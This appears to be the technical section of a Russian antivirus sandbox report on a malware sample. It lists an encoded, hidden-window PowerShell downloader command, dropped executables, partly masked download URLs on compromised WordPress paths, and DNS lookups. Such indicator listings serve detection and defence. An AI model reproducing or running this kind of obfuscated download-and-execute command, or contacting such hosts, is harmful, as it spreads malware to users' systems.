Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\1191785.cvr
- %HOMEPATH%\355.exe
- %HOMEPATH%\355.exe
- 'da####talleys.com':80
- 'pe###sports.com':80
- 'ne####mixnews.com':80
- http://da####talleys.com/wp-includes/rK7SE/
- http://ne####mixnews.com/wp-admin/2QwjJ/
- DNS ASK da####talleys.com
- DNS ASK pe####liotar.com
- DNS ASK pe###sports.com
- DNS ASK ne####mixnews.com
- DNS ASK fi###rbling.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...' (со скрытым окном)